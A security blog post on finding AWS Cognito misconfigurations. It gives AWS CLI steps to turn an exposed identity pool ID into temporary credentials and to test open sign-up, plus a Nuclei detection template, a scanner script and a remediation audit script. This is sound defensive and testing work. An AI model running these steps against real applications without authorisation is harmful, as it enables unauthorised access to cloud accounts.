Hunting for AWS Cognito Security Misconfigurations: A Guide to Uncovering Hidden Dangers
Introduction
AWS Cognito is a managed identity service that lets developers add user sign-up and sign-in to their web and mobile applications. Misconfigurations in Cognito, however, can lead to unauthorized access to AWS services, authentication bypass, and privilege escalation.
Security Misconfiguration #1: Unauthorized Access to AWS Services due to Liberal AWS Credentials
One of the most critical misconfigurations is leaving Cognito configuration values such as identityPoolId, userPoolWebClientId, and aws_cognito_identity_pool_id in publicly served JavaScript files. An identity pool ID hardcoded this way can be exchanged for temporary AWS credentials, and if the role behind those credentials is over-privileged the result is unauthorized access to AWS services.
Detection
To detect this misconfiguration, use a combination of keyword searches and regex patterns to identify sensitive markers in HTTP responses. For example:
aws_cognito_identity_pool_id:"us-west-2:<REDACTED>", was found in https://stage.blah.net/static/js/main.36d14ee0.chunk.js
Exploitation
To exploit this misconfiguration, use the AWS CLI to fetch temporary AWS credentials using the exposed identityPoolId:
aws cognito-identity get-id --identity-pool-id "us-west-2:5<REDACTED>" --region "us-west-2"
Output:
{
    "IdentityId": "us-west-2:6f<REDACTED>"
}
aws cognito-identity get-credentials-for-identity --identity-id "us-west-2:6f<REDACTED>" --region "us-west-2"
Output:
{
    "IdentityId": "us-west-2:6f<REDACTED>",
    "Credentials": {
        "AccessKeyId": "<REDACTED>",
        "SecretKey": "<REDACTED>",
        "SessionToken": "...",
        "Expiration": "<REDACTED>"
    }
}
With these temporary AWS credentials, enumerate permissions associated with the credentials using tools such as Enumerate-iam or Scout Suite.
Nuclei YAML File
Here’s a Nuclei YAML file to automate the detection process:
id: aws-cognito-misconfiguration-markers
info:
  name: AWS Cognito Misconfiguration Markers
  author: Coastlincyber
  severity: high
  description: Detects potential AWS Cognito misconfigurations by searching for sensitive markers in JavaScript files.
  reference: https://www.yassineaboukir.com/talks/NahamConEU2022.pdf
  tags: aws,cognito,misconfiguration,javascript
requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - 'identityPoolId'
          - 'cognitoIdentityPoolId'
          - 'userPoolWebClientId'
          - 'userPoolId'
          - 'aws_user_pools_id'
          - 'aws_cognito_identity_pool_id'
        condition: or
      - type: word
        part: body
        words:
          - 'AWSCognitoIdentityProviderService'
          - 'CognitoIdentityCredentials'
          - 'AWS.CognitoIdentityServiceProvider'
          - 'cognitoUser'
        condition: or
    extractors:
      - type: regex
        part: body
        regex:
          - '(us|ap|ca|cn|eu|sa)-[a-z]+-\d:[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'
Katana Command
To automate the detection and exploitation of this misconfiguration, use the following Katana command:
katana -u https://stage.blah.net/ -jsl -rl 50 | nuclei -t ./aws-cognito-misconfiguration-markers.yaml
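The same marker words and identity pool ID regex as the Nuclei template, as an added Python example (not code from the post) that can be run offline against saved JavaScript bundles; the example.test URLs and the sample bodies, including the pool ID value, are constructed.

```python
import re

# Marker strings taken from the Nuclei template, grouped as they are there.
CONFIG_MARKERS = ("identityPoolId", "cognitoIdentityPoolId", "userPoolWebClientId",
                  "userPoolId", "aws_user_pools_id", "aws_cognito_identity_pool_id")
SDK_MARKERS = ("AWSCognitoIdentityProviderService", "CognitoIdentityCredentials",
               "AWS.CognitoIdentityServiceProvider", "cognitoUser")

# Identity pool ID pattern, identical to the template's extractor: <region>:<UUID>.
IDENTITY_POOL_RE = re.compile(
    r"(us|ap|ca|cn|eu|sa)-[a-z]+-\d:[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
)


def scan_js(url, body):
    """Return a finding for one JavaScript body, or None when no marker is present."""
    markers = [m for m in CONFIG_MARKERS + SDK_MARKERS if m in body]
    if not markers:
        return None
    # Deduplicate extracted IDs while keeping first-seen order.
    pool_ids = list(dict.fromkeys(m.group(0) for m in IDENTITY_POOL_RE.finditer(body)))
    return {"url": url, "markers": markers, "identity_pool_ids": pool_ids,
            "regions": sorted({p.split(":")[0] for p in pool_ids})}


def scan_all(samples):
    """Scan a {url: body} mapping and return only the bodies that produced a finding."""
    return [f for f in (scan_js(u, b) for u, b in samples.items()) if f]


# Constructed sample bundles (not real sites); the user pool ID uses the region_xxx
# format and must NOT match the identity pool regex, which requires a colon.
SAMPLES = {
    "https://example.test/static/js/main.chunk.js":
        'var awsmobile={"aws_project_region":"us-west-2",'
        '"aws_cognito_identity_pool_id":"us-west-2:0123abcd-0000-1111-2222-333344445555",'
        '"aws_user_pools_id":"us-west-2_AbCdEfGhI","aws_user_pools_web_client_id":"abc"};',
    "https://example.test/static/js/vendor.js": "function add(a,b){return a+b}",
}

if __name__ == "__main__":
    for finding in scan_all(SAMPLES):
        print(finding)
```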
Security Misconfiguration #2: Authentication Bypass due to Enabled Signup API Action
Another common misconfiguration is leaving the SignUp API action enabled on a user pool that does not need self-registration. Anyone who knows the app client ID can then create an account and, through the role granted to authenticated users, go on to access AWS services.
Detection
To detect this misconfiguration, use the AWS CLI to test the Signup API endpoint:
aws cognito-idp sign-up --client-id <client-id> --username <email-address> --password <password> --region <region>
If the request is successful, it indicates that the Signup API action is enabled.
Exploitation
Once the Signup API action is enabled, an attacker can create a new user and potentially access AWS services using the temporary credentials. The specific exploitation steps would depend on the configuration of the user pool and associated IAM roles.
Security Misconfiguration #3: Privilege Escalation through Writable User Attributes
AWS Cognito allows users to update their own user attributes. If attributes that the application relies on for authorization are left writable by default, an attacker can change their own values to gain elevated privileges.
Detection
To detect this misconfiguration, use the AWS CLI to fetch user attributes and test if they are writable:
aws cognito-idp get-user --region <region> --access-token <access-token>
Examine the output to identify which attributes are writable.
Exploitation
Once a writable attribute is identified, an attacker can update it to potentially gain elevated privileges. For example, if a custom attribute is used to determine user roles, and that attribute is writable, an attacker could modify it to assign themselves a higher-privileged role.
The specific exploitation steps would depend on how the application uses these attributes for authorization decisions.
Recommendations for Developers
To avoid these security misconfigurations, follow these guidelines:
- Remove sensitive details from server responses, including the Cognito identity pool ID.
- Disable sign-up on AWS Cognito if it is not required.
- Disable the unauthenticated role if it is not required.
- Review the IAM policies attached to the authenticated and unauthenticated roles to ensure least-privilege access.
- Evaluate all user attributes and disable writing permission if not necessary.
- Remember that the email attribute value may hold an unverified email address.
- Implement additional security measures such as multi-factor authentication (MFA) where appropriate.
- Regularly audit and monitor AWS Cognito configurations and usage patterns.
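The recommendations above, together with misconfigurations #2 and #3, can be checked from the account side. This is an added example, not code from the post: it audits the response dicts that boto3's describe_identity_pool, describe_user_pool and describe_user_pool_client return, so it runs offline; the sample responses below are constructed placeholders, not real pools.

```python
# Each function takes the response dict of the named boto3 call (assumed shapes:
# cognito-identity describe_identity_pool, cognito-idp describe_user_pool and
# describe_user_pool_client) and returns a list of human-readable findings.

def audit_identity_pool(pool):
    """Recommendation: disable the unauthenticated (guest) role if not required."""
    if pool.get("AllowUnauthenticatedIdentities"):
        return ["identity pool %s allows unauthenticated identities" % pool["IdentityPoolId"]]
    return []


def audit_user_pool(resp):
    """Recommendations: disable self-service sign-up (misconfiguration #2) and use MFA."""
    up, findings = resp["UserPool"], []
    admin_only = up.get("AdminCreateUserConfig", {}).get("AllowAdminCreateUserOnly", False)
    if not admin_only:
        findings.append("user pool %s permits self-service sign-up" % up["Id"])
    if up.get("MfaConfiguration", "OFF") == "OFF":
        findings.append("user pool %s has MFA disabled" % up["Id"])
    return findings


def audit_app_client(resp):
    """Recommendation: remove write permission on attributes users should not control."""
    client = resp["UserPoolClient"]
    # A user-writable custom: attribute is the misconfiguration #3 case whenever the
    # application derives roles or entitlements from it.
    writable_custom = [a for a in client.get("WriteAttributes", []) if a.startswith("custom:")]
    if not writable_custom:
        return []
    return ["app client %s lets users write %s" % (client["ClientId"], ", ".join(writable_custom))]


def audit_all(identity_pool, user_pool, app_client):
    return (audit_identity_pool(identity_pool) + audit_user_pool(user_pool)
            + audit_app_client(app_client))


# Constructed sample responses; every ID below is a placeholder.
SAMPLE_IDENTITY_POOL = {"IdentityPoolId": "us-west-2:00000000-0000-4000-8000-000000000000",
                        "IdentityPoolName": "demo", "AllowUnauthenticatedIdentities": True}
SAMPLE_USER_POOL = {"UserPool": {"Id": "us-west-2_EXAMPLE", "MfaConfiguration": "OFF",
                                 "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": False}}}
SAMPLE_APP_CLIENT = {"UserPoolClient": {"ClientId": "EXAMPLECLIENTID",
                                        "WriteAttributes": ["email", "name", "custom:role"]}}

if __name__ == "__main__":
    for line in audit_all(SAMPLE_IDENTITY_POOL, SAMPLE_USER_POOL, SAMPLE_APP_CLIENT):
        print("FINDING:", line)
```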
Conclusion
AWS Cognito security misconfigurations can have devastating consequences for applications and users. By following the guidelines outlined in this post, developers can identify and remediate common misconfigurations, ensuring the security and integrity of their applications. Remember to stay vigilant and continuously monitor your AWS Cognito applications for potential security threats. Regular security assessments and penetration testing can help identify vulnerabilities before they can be exploited by malicious actors.